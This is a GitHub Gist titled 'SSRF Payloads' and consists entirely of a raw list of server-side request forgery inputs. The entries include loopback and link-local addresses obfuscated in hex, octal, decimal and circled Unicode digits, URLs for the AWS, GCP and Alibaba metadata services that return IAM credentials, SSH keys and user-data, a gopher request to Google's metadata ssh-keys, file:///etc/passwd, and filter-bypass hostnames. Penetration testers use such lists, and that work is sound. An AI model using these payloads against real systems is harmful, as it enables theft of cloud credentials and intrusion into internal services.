Last active
March 13, 2024 17:24
-
-
Save ResistanceIsUseless/0c2df8ef3604a654e390c5d0070eaad6 to your computer and use it in GitHub Desktop.
SSRF Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 127.0.0.1 | |
| 127.0.1.3 | |
| 0 | |
| 127.1 | |
| 127.0.1 | |
| localhost | |
| 1.0.0.127.in-addr.arpa | |
| 01111111000000000000000000000001 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0.0.01 | |
| 7F000001 | |
| 2130706433 | |
| 6425673729 | |
| 127001 | |
| 127_0._0_1 | |
| 0000::1 | |
| 0000::1:80 | |
| ::ffff:7f00:0001 | |
| 0000:0000:0000:0000:0000:ffff:7f00:0001 | |
| spoofed.burpcollaborator.net | |
| localtest.me | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| bugbounty.dod.network | |
| 127.127.127.127 | |
| 0177.0.0.1 | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| whitelisted@127.0.0.1 | |
| 0x7f000001 | |
| 017700000001 | |
| 0177.00.00.01 | |
| 0000.0000.0000.0000 | |
| 0x7f.0x0.0x0.0x1 | |
| 0177.0000.0000.0001 | |
| 0177.0001.0000..0001 | |
| 0x7f.0x1.0x0.0x1 | |
| 0x7f.0x1.0x1 | |
| 0x7f.0x00.0x00.0x01 | |
| 0177.0.0.01 | |
| ht�️tp://12�7.0.0.1 | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| loopback:+11211aaa | |
| loopback:00011211aaaa | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| 169.254.169.254 | |
| 2852039166 | |
| 7147006462 | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0251.0376.0251.0376 | |
| 169。254。169。254 | |
| 169。254。169。254 | |
| ⑯⑨。②⑤④。⑯⑨。②⑤④ | |
| ⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80 | |
| ⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80 | |
| ②⑧⑤②⓪③⑨①⑥⑥:80 | |
| ④②⑤。⑤①⓪。④②⑤。⑤①⓪:80 | |
| ⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80 | |
| ⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80 | |
| [::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| [::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 | |
| ⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80 | |
| ⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80 | |
| ⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80 | |
| dict://attacker:11111 | |
| file:///etc/passwd | |
| file://\/\/etc/passwd | |
| file://path/to/file | |
| gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a | |
| gopher://nozaki.io/_SSRF%0ATest! | |
| 0.0.0.0:22 | |
| 0.0.0.0:443 | |
| 0.0.0.0:80 | |
| 0.0.0.0:443 | |
| 0.0.0.0:3389 | |
| 0000::1:22 | |
| 0000::1:25 | |
| 0000::1:3128 | |
| 0000::1:80 | |
| 0000::1:3389 | |
| 0177.0.0.1 | |
| 0251.00376.000251.0000376 | |
| 0251.0376.0251.0376 | |
| 0x41414141A9FEA9FE | |
| 0xA9.0xFE.0xA9.0xFE | |
| 0xA9FEA9FE | |
| 0xa9.0xfe.0xa9.0xfe | |
| 0xa9fea9fe | |
| 100.100.100.200/latest/meta-data/ | |
| 100.100.100.200/latest/meta-data/image-id | |
| 100.100.100.200/latest/meta-data/instance-id | |
| 127.0.0.0 | |
| 127.0.0.1:22 | |
| 127.0.0.1:2379/version | |
| 127.0.0.1:443 | |
| 127.0.0.1:80 | |
| 127.0.0.1:3389 | |
| 127.0.0.1:8000 | |
| 127.0.0.1:9901 | |
| 127.0.0.1:8001 | |
| 127.0.0.1:8444 | |
| 127.0.1.3 | |
| 127.1.1.1 | |
| 127.1.1.1:80#\@127.2.2.2:80 | |
| 127.1.1.1:80:\@@127.2.2.2:80 | |
| 127.1.1.1:80\@127.2.2.2:80 | |
| 127.1.1.1:80\@@127.2.2.2:80 | |
| 127.127.127.127 | |
| 127.127.127.127.nip.io | |
| 169.254.169.254 | |
| 169.254.169.254.xip.io | |
| 169.254.169.254/computeMetadata/v1/ | |
| 169.254.169.254/latest/dynamic/instance-identity/document | |
| 169.254.169.254/latest/meta-data/ | |
| 169.254.169.254/latest/meta-data/ami-id | |
| 169.254.169.254/latest/meta-data/hostname | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/ | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| 169.254.169.254/latest/meta-data/iam/security-credentials/s3access | |
| 169.254.169.254/latest/meta-data/public-keys/ | |
| 169.254.169.254/latest/meta-data/public-keys/0/openssh-key | |
| 169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key | |
| 169.254.169.254/latest/meta-data/reservation-id | |
| 169.254.169.254/latest/user-data | |
| 169.254.169.254/latest/user-data/iam/security-credentials/ | |
| 192.0.0.192/latest/ | |
| 192.0.0.192/latest/attributes/ | |
| 192.0.0.192/latest/meta-data/ | |
| 192.0.0.192/latest/user-data/ | |
| 1ynrnhl.xip.io | |
| 2130706433 | |
| 2852039166 | |
| 3232235521 | |
| 3232235777 | |
| 425.510.425.510 | |
| 7147006462 | |
| [0:0:0:0:0:ffff:127.0.0.1] | |
| [0:0:0:0:0:ffff:127.0.0.1]:8000 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8001 | |
| [0:0:0:0:0:ffff:127.0.0.1]:8444 | |
| [0:0:0:0:0:ffff:127.0.0.1]:9901 | |
| [::] | |
| [::]:22 | |
| [::]:25 | |
| [::]:3128 | |
| [::]:80 | |
| [::]:3389 | |
| [::]:8000 | |
| [::]:8001 | |
| [::]:8444 | |
| [::]:9901 | |
| app-169-254-169-254.nip.io | |
| bugbounty.dod.network | |
| customer1.app.localhost.my.company.127.0.0.1.nip.io | |
| customer2-app-169-254-169-254.nip.io | |
| instance-data | |
| localhost:+11211aaa | |
| localhost:00011211aaaa | |
| localhost:22 | |
| localhost:443 | |
| localhost:80 | |
| localhost:3389 | |
| localhost:8000 | |
| localhost:8001 | |
| localhost:8444 | |
| localhost:9901 | |
| localhost.localdomain | |
| loopback | |
| loopback:22 | |
| loopback:80 | |
| loopback:443 | |
| loopback:3389 | |
| loopback:8000 | |
| loopback:9901 | |
| loopback:8001 | |
| loopback:8444 | |
| localtest.me | |
| ipcop.localdomain:8443 | |
| mail.ebc.apple.com | |
| metadata.google.internal/computeMetadata/v1/ | |
| metadata.google.internal/computeMetadata/v1/instance/hostname | |
| metadata.google.internal/computeMetadata/v1/instance/id | |
| metadata.google.internal/computeMetadata/v1/project/project-id | |
| metadata.nicob.net | |
| owasp.org.169.254.169.254.nip.io | |
| spoofed.burpcollaborator.net | |
| ssrf-169.254.169.254.localdomain.pw | |
| ssrf-cloud.localdomain.pw | |
| www.owasp.org.1ynrnhl.xip.io |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment